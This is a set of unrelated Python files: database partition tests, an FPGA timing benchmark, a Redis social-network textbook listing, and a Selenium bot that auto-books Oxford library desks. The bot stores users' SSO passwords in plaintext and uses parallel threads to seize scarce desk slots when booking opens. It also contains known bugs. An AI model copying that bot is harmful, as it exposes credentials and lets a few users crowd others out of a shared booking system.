class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_partitions` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
log.info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, cons.default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
log.info(metric_type)
get_binary_index["metric_type"] = metric_type
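# structure metrics are not supported by BIN_IVF_FLAT, so index creation is expected to raise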
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
"""
target: test load partitions, without connection
method: load partitions with correct params, with a disconnected instance
expected: load raise exception
"""
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
"""
target: test release partitions, without connection
method: release partitions with correct params, with a disconnected instance
expected: release raise exception
"""
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_not_existed(self, connect, collection):
"""
target: test load partition for invalid scenario
method: load not existed partition
expected: raise exception and report the error
"""
partition_name = gen_unique_str(uid_load)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release partition without load
method: release partition without load
expected: release successfully
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_after_drop(self, connect, collection):
"""
target: test load and release partition after drop
method: drop partition and then load and release it
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test load partition after the partition is dropped
method: create partition, insert and flush, load the partition, drop it, then load it again
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test load and release a partition after the collection is dropped
method: create partition, insert and flush, load and release the partition, drop the collection, then load and release the partition again
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load partition with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test load invalid partition
method: load partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test release invalid partition
method: release partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.release_partitions(collection, [partition_name])
|
scraper.py
|
# Bodleian Booker Bot
import time
import sched
import json
import datetime
import threading
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.service import Service
# Define preference dictionary
preference = {"UPPER BOD":["Upper Reading Room Desk Booking","10:00","13:00","16:30"],
"LOWER BOD":["Lower Reading Room Desk Booking","10:00","13:00","16:30"],
"LAW LIB":["Law Library Desk Booking","10:00","13:00","16:30"],
"GLINK":["Gladstone Link Desk Booking","10:00","13:00","16:30"],
"UPPER RAD CAM":["Upper Camera Reader Desk Booking","10:00","13:00","16:30"],
"LOWER RAD CAM":["Lower Camera Reader Desk Booking","10:00","13:00","16:30"],
"SACKLER":["Sackler Library - Desk Booking","10:00","13:00","16:30"],
"SSL":["Social Science Library - Open Plan Desk Booking","10:00","13:00","16:30"],
"TAYLOR":["Taylor Institution Library - Desk Booking","10:00","13:00","16:30"],
"VERE":["Vere Harmsworth Library Desk Booking","10:00","13:00","16:30"]}
# Check if the xpath exists on the webpage
def hasXpath(xpath,driver):
try:
driver.find_element_by_xpath(xpath)
return True
except:
return False
# Highlight an element defined by the driver
def highlight(element):
# Highlights a Selenium webdriver element
driver = element._parent
def apply_style(s):
driver.execute_script("arguments[0].setAttribute('style', arguments[1])", element, s)
original_style = element.get_attribute('style')
apply_style("border: 4px solid red")
if (element.get_attribute("style")!=None):
time.sleep(5)
apply_style(original_style)
# Click through the booking process
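# userdata layout (inferred from how it is used below):
#   userdata[0] - checkout-form field values keyed by element id
#   userdata[1] - SSO credentials {'username', 'password'}
#   userdata[2] - preferred library per slot {'morning', 'afternoon', 'evening'}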
def book(userdata, service, time_day):
global preference
# Login to SSO
driver = webdriver.Remote(service.service_url)
driver.get('https://spacefinder.bodleian.ox.ac.uk/')
time.sleep(1)
email = driver.find_element_by_id('i0116')
email.send_keys(userdata[1]['username'])
time.sleep(0.5)
submit = driver.find_element_by_id("idSIButton9")
submit.click()
time.sleep(1)
password = driver.find_element_by_id("i0118")
password.send_keys(userdata[1]['password'])
time.sleep(1)
signin = driver.find_element_by_id("idSIButton9")
signin.click()
#time.sleep(6)
# Click on the calendar date until the element loads
# BUG: Wait until 10am and then refresh the page.
okay = False
while okay != True:
try:
calendar = driver.find_element_by_xpath("//span[@aria-label='" + day + "']")
calendar.click()
okay = True
except:
print("Calendar loading")
# Clicking on slot until it loads
okay = False
if time_day == "morning":
indexx = 1
elif time_day == "afternoon":
indexx = 2
else:
indexx = 3
NO_SLOTS = 0
while okay != True:
try:
# NOT PASSING PREFERENCES
slot = driver.find_element_by_xpath("//div[contains(h5, '"+preference[userdata[2][time_day]][0]+"') and contains(p, '"+preference[userdata[2][time_day]][indexx]+"')]/parent::*/descendant::a")
#highlight(slot)
slot.click()
okay = True
except:
xpather = "//h3[contains(text(), 'Sorry, no spaces found')]"
xpather2 = "//div[contains(@class, 'tickets__submit')]"
if hasXpath(xpather,driver):
print("NO MORE SLOTS")
elif hasXpath(xpather2,driver):
print("NO MORE SLOTS FOR THIS SPECIFIC ONE")
NO_SLOTS +=1
if NO_SLOTS > 3:
return
else:
print("Slots are loading")
okay = False
while okay != True:
try:
confirm = driver.find_element_by_name("ctl00$ContentPlaceHolder$Cart$CheckoutButton")
confirm.click()
okay = True
except:
print("Loading!")
okay = False
while okay != True:
try:
for key in userdata[0]:
element = driver.find_element_by_id(key)
element.send_keys(userdata[0][key])
confirm = driver.find_element_by_id("submitOrderButton")
confirm.click()
okay = True
except:
print("Loading Form!")
time.sleep(20)
ids = ["FirstNameundefined","LastNameundefined","Phoneundefined","Street2undefined","Emailundefined","ConfirmEmailundefined"]
# Gets data from json file and returns a dictionary of lists for user data
userdata = {}
try:
with open('data.json') as json_file:
data = json.load(json_file)
for p in data['users']:
current_user = p
temp = []
userdata[current_user] = [data['users'][p][item] for item in data['users'][p]]
except:
with open('userdata.json') as json_file:
data = json.load(json_file)
for p in data['users']:
current_user = p
temp = []
userdata[current_user] = [data['users'][p][item] for item in data['users'][p]]
userkeys = []
index = 0
for user in userdata:
userdata[user].insert(4,userdata[user][-4])
userkeys.append([dict(zip(ids, userdata[user][0:6]))])
userkeys[int(index)].append({"username":userdata[user][8]['username'],"password":userdata[user][8]['password']})
userkeys[int(index)].append({"morning":userdata[user][7]['morning'],"afternoon":userdata[user][7]['afternoon'],"evening":userdata[user][7]['evening']})
index += 1
# BUG: the date has a leading zero (e.g. "08") but must be in the form "8", as in "February 8, 2021"
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=3)
#day = NextDay_Date.strftime("%B %d, %Y").replace(" 0", " ")
day = NextDay_Date.strftime("%B %d, %Y")
def runner():
service = Service('chromedriver.exe')
service.start()
threads = []
times = ["morning","afternoon","evening"]
for user in userkeys:
for i in times:
print("Thread Started")
t = threading.Thread(target=book, args=(user,service,i))
threads.append(t)
t.start()
def wait_start(runTime):
startTime = datetime.time(*(map(int, runTime.split(':'))))
while startTime > datetime.datetime.today().time(): # you can add here any additional variable to break loop if necessary
time.sleep(1)# you can change 1 sec interval to any other
return runner()
wait_start('09:00')
|
picorv32_benchmark.py
|
#!/usr/bin/env python3
import os, sys, threading
from os import path
import subprocess
import re
num_runs = 8
if not path.exists("picorv32.json"):
subprocess.run(["wget", "https://raw.githubusercontent.com/cliffordwolf/picorv32/master/picorv32.v"], check=True)
subprocess.run(["yosys", "-q", "-p", "synth_ice40 -json picorv32.json -top top", "picorv32.v", "picorv32_top.v"], check=True)
fmax = {}
if not path.exists("picorv32_work"):
os.mkdir("picorv32_work")
threads = []
for i in range(num_runs):
def runner(run):
ascfile = "picorv32_work/picorv32_s{}.asc".format(run)
if path.exists(ascfile):
os.remove(ascfile)
result = subprocess.run(["../nextpnr-ice40", "--hx8k", "--seed", str(run), "--json", "picorv32.json", "--asc", ascfile, "--freq", "70"], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
if result.returncode != 0:
print("Run {} failed!".format(run))
else:
icetime_res = subprocess.check_output(["icetime", "-d", "hx8k", ascfile])
fmax_m = re.search(r'\(([0-9.]+) MHz\)', icetime_res.decode('utf-8'))
fmax[run] = float(fmax_m.group(1))
threads.append(threading.Thread(target=runner, args=[i+1]))
for t in threads: t.start()
for t in threads: t.join()
fmax_min = min(fmax.values())
fmax_max = max(fmax.values())
fmax_avg = sum(fmax.values()) / len(fmax)
print("{}/{} runs passed".format(len(fmax), num_runs))
print("icetime: min = {} MHz, avg = {} MHz, max = {} MHz".format(fmax_min, fmax_avg, fmax_max))
|
ch08_listing_source.py
|
import BaseHTTPServer
import cgi
import functools
import json
import math
import random
import socket
import SocketServer
import time
import threading
import unittest
import uuid
import urlparse
import redis
def acquire_lock_with_timeout(
conn, lockname, acquire_timeout=10, lock_timeout=10):
identifier = str(uuid.uuid4()) #A
lockname = 'lock:' + lockname
lock_timeout = int(math.ceil(lock_timeout)) #D
end = time.time() + acquire_timeout
while time.time() < end:
if conn.setnx(lockname, identifier): #B
conn.expire(lockname, lock_timeout) #B
return identifier
elif not conn.ttl(lockname): #C
conn.expire(lockname, lock_timeout) #C
time.sleep(.001)
return False
def release_lock(conn, lockname, identifier):
pipe = conn.pipeline(True)
lockname = 'lock:' + lockname
while True:
try:
pipe.watch(lockname) #A
if pipe.get(lockname) == identifier: #A
pipe.multi() #B
pipe.delete(lockname) #B
pipe.execute() #B
return True #B
pipe.unwatch()
break
except redis.exceptions.WatchError: #C
pass #C
return False #D
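# Usage sketch (not part of the book listing; 'conn' is assumed to be a redis.Redis
# client and 'market:' an arbitrary lock name): acquire, do the work, and always
# release in a try/finally so a failure in the critical section cannot leave the lock held.
#   identifier = acquire_lock_with_timeout(conn, 'market:', acquire_timeout=5)
#   if identifier:
#       try:
#           pass  # critical section goes here
#       finally:
#           release_lock(conn, 'market:', identifier)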
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s'%(type, component)
if CHECKED.get(key) < time.time() - wait: #A
CHECKED[key] = time.time() #B
config = json.loads(conn.get(key) or '{}') #C
old_config = CONFIGS.get(key) #D
if config != old_config: #E
CONFIGS[key] = config #F
return CONFIGS.get(key)
REDIS_CONNECTIONS = {}
def redis_connection(component, wait=1): #A
key = 'config:redis:' + component #B
def wrapper(function): #C
@functools.wraps(function) #D
def call(*args, **kwargs): #E
old_config = CONFIGS.get(key, object()) #F
_config = get_config( #G
config_connection, 'redis', component, wait) #G
config = {}
for k, v in _config.iteritems(): #L
config[k.encode('utf-8')] = v #L
if config != old_config: #H
REDIS_CONNECTIONS[key] = redis.Redis(**config) #H
return function( #I
REDIS_CONNECTIONS.get(key), *args, **kwargs) #I
return call #J
return wrapper #K
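# Usage sketch (not part of the book listing): redis_connection() injects a live Redis
# client as the first argument of the decorated function, rebuilding the client whenever
# the JSON stored at 'config:redis:<component>' changes. Note that the wrapper relies on
# a 'config_connection' client that is set up elsewhere in the book, not in this listing.
#   @redis_connection('logs')
#   def log_line(conn, line):
#       conn.rpush('recent:logs', line)
#   log_line('some line')  # 'conn' is supplied automatically by the decorator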
def execute_later(conn, queue, name, args):
# this is just for testing purposes
assert conn is args[0]
t = threading.Thread(target=globals()[name], args=tuple(args))
t.setDaemon(1)
t.start()
# <start id="create-twitter-user"/>
def create_user(conn, login, name):
llogin = login.lower()
lock = acquire_lock_with_timeout(conn, 'user:' + llogin, 1) #A
if not lock: #B
return None #B
if conn.hget('users:', llogin): #C
release_lock(conn, 'user:' + llogin, lock) #C
return None #C
id = conn.incr('user:id:') #D
pipeline = conn.pipeline(True)
pipeline.hset('users:', llogin, id) #E
pipeline.hmset('user:%s'%id, { #F
'login': login, #F
'id': id, #F
'name': name, #F
'followers': 0, #F
'following': 0, #F
'posts': 0, #F
'signup': time.time(), #F
})
pipeline.execute()
release_lock(conn, 'user:' + llogin, lock) #G
return id #H
# <end id="create-twitter-user"/>
#A Try to acquire the lock for the lowercased version of the login name. This function is defined in chapter 6
#B If we couldn't get the lock, then someone else already has the same login name
#C We also store a HASH of lowercased login names to user ids, so if there is already a login name that maps to an ID, we know and won't give it to a second person
#D Each user is given a unique id, generated by incrementing a counter
#E Add the lowercased login name to the HASH that maps from login names to user ids
#F Add the user information to the user's HASH
#G Release the lock over the login name
#H Return the id of the user
#END
# <start id="create-twitter-status"/>
def create_status(conn, uid, message, **data):
pipeline = conn.pipeline(True)
pipeline.hget('user:%s'%uid, 'login') #A
pipeline.incr('status:id:') #B
login, id = pipeline.execute()
if not login: #C
return None #C
data.update({
'message': message, #D
'posted': time.time(), #D
'id': id, #D
'uid': uid, #D
'login': login, #D
})
pipeline.hmset('status:%s'%id, data) #D
pipeline.hincrby('user:%s'%uid, 'posts')#E
pipeline.execute()
return id #F
# <end id="create-twitter-status"/>
#A Get the user's login name from their user id
#B Create a new id for the status message
#C Verify that we have a proper user account before posting
#D Prepare and set the data for the status message
#E Record the fact that a status message has been posted
#F Return the id of the newly created status message
#END
# <start id="fetch-page"/>
def get_status_messages(conn, uid, timeline='home:', page=1, count=30):#A
statuses = conn.zrevrange( #B
'%s%s'%(timeline, uid), (page-1)*count, page*count-1) #B
pipeline = conn.pipeline(True)
for id in statuses: #C
pipeline.hgetall('status:%s'%id) #C
return filter(None, pipeline.execute()) #D
# <end id="fetch-page"/>
#A We will take an optional 'timeline' argument, as well as page size and status message counts
#B Fetch the most recent status ids in the timeline
#C Actually fetch the status messages themselves
#D Filter will remove any 'missing' status messages that had been previously deleted
#END
# <start id="follow-user"/>
HOME_TIMELINE_SIZE = 1000
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid #A
fkey2 = 'followers:%s'%other_uid #A
if conn.zscore(fkey1, other_uid): #B
return None #B
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, other_uid, now) #C
pipeline.zadd(fkey2, uid, now) #C
pipeline.zrevrange('profile:%s'%other_uid, #E
0, HOME_TIMELINE_SIZE-1, withscores=True) #E
following, followers, status_and_score = pipeline.execute()[-3:]
pipeline.hincrby('user:%s'%uid, 'following', int(following)) #F
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers)) #F
if status_and_score:
pipeline.zadd('home:%s'%uid, **dict(status_and_score)) #G
pipeline.zremrangebyrank('home:%s'%uid, 0, -HOME_TIMELINE_SIZE-1)#G
pipeline.execute()
return True #H
# <end id="follow-user"/>
#A Cache the following and followers key names
#B If the other_uid is already being followed, return
#C Add the uids to the proper following and followers ZSETs
#E Fetch the most recent HOME_TIMELINE_SIZE status messages from the newly followed user's profile timeline
#F Update the known size of the following and followers ZSETs in each user's HASH
#G Update the home timeline of the following user, keeping only the most recent 1000 status messages
#H Return that the user was correctly followed
#END
# <start id="unfollow-user"/>
def unfollow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid #A
fkey2 = 'followers:%s'%other_uid #A
if not conn.zscore(fkey1, other_uid): #B
return None #B
pipeline = conn.pipeline(True)
pipeline.zrem(fkey1, other_uid) #C
pipeline.zrem(fkey2, uid) #C
pipeline.zrevrange('profile:%s'%other_uid, #E
0, HOME_TIMELINE_SIZE-1) #E
following, followers, statuses = pipeline.execute()[-3:]
pipeline.hincrby('user:%s'%uid, 'following', int(following)) #F
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers)) #F
if statuses:
pipeline.zrem('home:%s'%uid, *statuses) #G
pipeline.execute()
return True #H
# <end id="unfollow-user"/>
#A Cache the following and followers key names
#B If the other_uid is not being followed, return
#C Remove the uids from the proper following and followers ZSETs
#E Fetch the most recent HOME_TIMELINE_SIZE status messages from the user that we stopped following
#F Update the known size of the following and followers ZSETs in each user's HASH
#G Update the home timeline, removing any status messages from the previously followed user
#H Return that the unfollow executed successfully
#END
# <start id="exercise-refilling-timelines"/>
REFILL_USERS_STEP = 50
def refill_timeline(conn, incoming, timeline, start=0):
if not start and conn.zcard(timeline) >= 750: #A
return #A
users = conn.zrangebyscore(incoming, start, 'inf', #B
start=0, num=REFILL_USERS_STEP, withscores=True) #B
pipeline = conn.pipeline(False)
for uid, start in users:
pipeline.zrevrange('profile:%s'%uid, #C
0, HOME_TIMELINE_SIZE-1, withscores=True) #C
messages = []
for results in pipeline.execute():
messages.extend(results) #D
messages.sort(key=lambda x:-x[1]) #E
del messages[HOME_TIMELINE_SIZE:] #E
pipeline = conn.pipeline(True)
if messages:
pipeline.zadd(timeline, **dict(messages)) #F
pipeline.zremrangebyrank( #G
timeline, 0, -HOME_TIMELINE_SIZE-1) #G
pipeline.execute()
if len(users) >= REFILL_USERS_STEP:
execute_later(conn, 'default', 'refill_timeline', #H
[conn, incoming, timeline, start]) #H
# <end id="exercise-refilling-timelines"/>
#A If the timeline is 3/4 of the way full already, don't bother refilling it
#B Fetch a group of users that should contribute to this timeline
#C Fetch the most recent status messages from the users followed
#D Group all of the fetched status messages together
#E Sort all of the status messages by how recently they were posted, and keep the most recent 1000
#F Add all of the fetched status messages to the user's home timeline
#G Remove any messages that are older than the most recent 1000
#H If there are still more users left to fetch from, keep going
#END
# <start id="exercise-follow-user-list"/>
def follow_user_list(conn, uid, other_uid, list_id):
fkey1 = 'list:in:%s'%list_id #A
fkey2 = 'list:out:%s'%other_uid #A
timeline = 'list:statuses:%s'%list_id #A
if conn.zscore(fkey1, other_uid): #B
return None #B
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, other_uid, now) #C
pipeline.zadd(fkey2, list_id, now) #C
pipeline.zcard(fkey1) #D
pipeline.zrevrange('profile:%s'%other_uid, #E
0, HOME_TIMELINE_SIZE-1, withscores=True) #E
following, status_and_score = pipeline.execute()[-2:]
pipeline.hset('list:%s'%list_id, 'following', following) #F
pipeline.zadd(timeline, **dict(status_and_score)) #G
pipeline.zremrangebyrank(timeline, 0, -HOME_TIMELINE_SIZE-1)#G
pipeline.execute()
return True #H
# <end id="exercise-follow-user"/>
#A Cache the key names
#B If the other_uid is already being followed by the list, return
#C Add the uids to the proper ZSETs
#D Find the size of the list ZSET
#E Fetch the most recent status messages from the user's profile timeline
#F Update the known size of the list ZSETs in the list information HASH
#G Update the list of status messages
#H Return that adding the user to the list completed successfully
#END
# <start id="exercise-unfollow-user-list"/>
def unfollow_user_list(conn, uid, other_uid, list_id):
fkey1 = 'list:in:%s'%list_id #A
fkey2 = 'list:out:%s'%other_uid #A
timeline = 'list:statuses:%s'%list_id #A
if not conn.zscore(fkey1, other_uid): #B
return None #B
pipeline = conn.pipeline(True)
pipeline.zrem(fkey1, other_uid) #C
pipeline.zrem(fkey2, list_id) #C
pipeline.zcard(fkey1) #D
pipeline.zrevrange('profile:%s'%other_uid, #E
0, HOME_TIMELINE_SIZE-1) #E
following, statuses = pipeline.execute()[-2:]
pipeline.hset('list:%s'%list_id, 'following', following) #F
if statuses:
pipeline.zrem(timeline, *statuses) #G
refill_timeline(conn, fkey1, timeline) #H
pipeline.execute()
return True #I
# <end id="exercise-unfollow-user-list"/>
#A Cache the key names
#B If the other_uid is not being followed by the list, return
#C Remove the uids from the proper ZSETs
#D Find the size of the list ZSET
#E Fetch the most recent status messages from the user that we stopped following
#F Update the known size of the list ZSETs in the list information HASH
#G Update the list timeline, removing any status messages from the previously followed user
#H Start refilling the list timeline
#I Return that the unfollow executed successfully
#END
# <start id="exercise-create-user-list"/>
def create_user_list(conn, uid, name):
pipeline = conn.pipeline(True)
pipeline.hget('user:%s'%uid, 'login') #A
pipeline.incr('list:id:') #B
login, id = pipeline.execute()
if not login: #C
return None #C
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd('lists:%s'%uid, **{id: now}) #D
pipeline.hmset('list:%s'%id, { #E
'name': name, #E
'id': id, #E
'uid': uid, #E
'login': login, #E
'following': 0, #E
'created': now, #E
})
pipeline.execute()
return id #F
# <end id="exercise-create-user-list"/>
#A Fetch the login name of the user who is creating the list
#B Generate a new list id
#C If the user doesn't exist, return
#D Add the new list to a ZSET of lists that the user has created
#E Create the list information HASH
#F Return the new list id
#END
# <start id="post-message"/>
def post_status(conn, uid, message, **data):
id = create_status(conn, uid, message, **data) #A
if not id: #B
return None #B
posted = conn.hget('status:%s'%id, 'posted') #C
if not posted: #D
return None #D
post = {str(id): float(posted)}
conn.zadd('profile:%s'%uid, **post) #E
syndicate_status(conn, uid, post) #F
return id
# <end id="post-message"/>
#A Create a status message using the earlier function
#B If the creation failed, return
#C Get the time that the message was posted
#D If the post wasn't found, return
#E Add the status message to the user's profile timeline
#F Actually push the status message out to the followers of the user
#END
# <start id="syndicate-message"/>
POSTS_PER_PASS = 1000 #A
def syndicate_status(conn, uid, post, start=0):
followers = conn.zrangebyscore('followers:%s'%uid, start, 'inf',#B
start=0, num=POSTS_PER_PASS, withscores=True) #B
pipeline = conn.pipeline(False)
for follower, start in followers: #E
pipeline.zadd('home:%s'%follower, **post) #C
pipeline.zremrangebyrank( #C
'home:%s'%follower, 0, -HOME_TIMELINE_SIZE-1)#C
pipeline.execute()
if len(followers) >= POSTS_PER_PASS: #D
execute_later(conn, 'default', 'syndicate_status', #D
[conn, uid, post, start]) #D
# <end id="syndicate-message"/>
#A Only send to 1000 users per pass
#B Fetch the next group of 1000 followers, starting at the last person to be updated last time
#E Iterating through the followers results will update the 'start' variable, which we can later pass on to subsequent syndicate_status() calls
#C Add the status to the home timelines of all of the fetched followers, and trim the home timelines so they don't get too big
#D If at least 1000 followers had received an update, execute the remaining updates in a task
#END
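# Note on the pagination above (editor's note, not from the book): the followers ZSET is
# scored by follow time, so each zrangebyscore() pass returns at most POSTS_PER_PASS
# (follower, score) pairs at or after 'start'. The for-loop rebinds 'start' to each
# follower's score, so the value left over after the loop is where the deferred call
# resumes; re-sending to the boundary follower is harmless because ZADD simply
# overwrites the same member and score.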
# <start id="syndicate-message-list"/>
def syndicate_status_list(conn, uid, post, start=0, on_lists=False):
key = 'followers:%s'%uid #A
base = 'home:%s' #A
if on_lists: #A
key = 'list:out:%s'%uid #A
base = 'list:statuses:%s' #A
followers = conn.zrangebyscore(key, start, 'inf', #B
start=0, num=POSTS_PER_PASS, withscores=True) #B
pipeline = conn.pipeline(False)
for follower, start in followers: #C
pipeline.zadd(base%follower, **post) #C
pipeline.zremrangebyrank( #C
base%follower, 0, -HOME_TIMELINE_SIZE-1) #C
pipeline.execute()
if len(followers) >= POSTS_PER_PASS: #D
execute_later(conn, 'default', 'syndicate_status_list', #D
[conn, uid, post, start, on_lists]) #D
elif not on_lists:
execute_later(conn, 'default', 'syndicate_status_list', #E
[conn, uid, post, 0, True]) #E
# <end id="syndicate-message-list"/>
#A Use keys for home timelines or list timelines, depending on how far along we are
#B Fetch the next group of 1000 followers or lists, starting at the last user or list to be updated last time
#C Add the status to the home timelines of all of the fetched followers, and trim the home timelines so they don't get too big
#D If at least 1000 followers had received an update, execute the remaining updates in a task
#E Start executing over lists if we haven't executed over lists yet, but we are done with home timelines
#END
# <start id="delete-message"/>
def delete_status(conn, uid, status_id):
key = 'status:%s'%status_id
lock = acquire_lock_with_timeout(conn, key, 1) #A
if not lock: #B
return None #B
if conn.hget(key, 'uid') != str(uid): #C
release_lock(conn, key, lock) #C
return None #C
pipeline = conn.pipeline(True)
pipeline.delete(key) #D
pipeline.zrem('profile:%s'%uid, status_id) #E
pipeline.zrem('home:%s'%uid, status_id) #F
pipeline.hincrby('user:%s'%uid, 'posts', -1) #G
pipeline.execute()
release_lock(conn, key, lock)
return True
# <end id="delete-message"/>
#A Acquire a lock around the status object to ensure that no one else is trying to delete it when we are
#B If we didn't get the lock, return
#C If the user doesn't match the user stored in the status message, return
#D Delete the status message
#E Remove the status message id from the user's profile timeline
#F Remove the status message id from the user's home timeline
#G Reduce the number of posted messages in the user information HASH
#END
# <start id="exercise-clean-out-timelines"/>
def clean_timelines(conn, uid, status_id, start=0, on_lists=False):
key = 'followers:%s'%uid #A
base = 'home:%s' #A
if on_lists: #A
key = 'list:out:%s'%uid #A
base = 'list:statuses:%s' #A
followers = conn.zrangebyscore(key, start, 'inf', #B
start=0, num=POSTS_PER_PASS, withscores=True) #B
pipeline = conn.pipeline(False)
for follower, start in followers: #C
pipeline.zrem(base%follower, status_id) #C
pipeline.execute()
if len(followers) >= POSTS_PER_PASS: #D
execute_later(conn, 'default', 'clean_timelines' , #D
[conn, uid, status_id, start, on_lists]) #D
elif not on_lists:
execute_later(conn, 'default', 'clean_timelines', #E
[conn, uid, status_id, 0, True]) #E
# <end id="exercise-clean-out-timelines"/>
#A Use keys for home timelines or list timelines, depending on how far along we are
#B Fetch the next group of 1000 followers or lists, starting at the last user or list to be updated last time
#C Remove the status from the home timelines of all of the fetched followers
#D If at least 1000 followers had received an update, execute the remaining updates in a task
#E Start executing over lists if we haven't executed over lists yet, but we are done with home timelines
#END
# <start id="streaming-http-server"/>
class StreamingAPIServer( #A
SocketServer.ThreadingMixIn, #B
BaseHTTPServer.HTTPServer): #B
daemon_threads = True #C
class StreamingAPIRequestHandler( #D
BaseHTTPServer.BaseHTTPRequestHandler): #E
def do_GET(self): #F
parse_identifier(self) #G
if self.path != '/statuses/sample.json': #H
return self.send_error(404) #H
process_filters(self) #I
def do_POST(self): #J
parse_identifier(self) #K
if self.path != '/statuses/filter.json': #L
return self.send_error(404) #L
process_filters(self) #M
# <end id="streaming-http-server"/>
#A Create a new class called 'StreamingAPIServer'
#B This new class should have the ability to create new threads with each request, and should be a HTTPServer
#C Tell the internals of the threading server to shut down all client request threads if the main server thread dies
#D Create a new class called 'StreamingAPIRequestHandler'
#E This new class should be able to handle HTTP requests
#F Create a method that is called do_GET(), which will be executed on GET requests performed against this server
#G Call a helper function that handles the fetching of an identifier for the client
#H If the request is not a 'sample' or 'firehose' streaming GET request, return a '404 not found' error
#I Otherwise, call a helper function that actually handles the filtering
#J Create a method that is called do_POST(), which will be executed on POST requests performed against this server
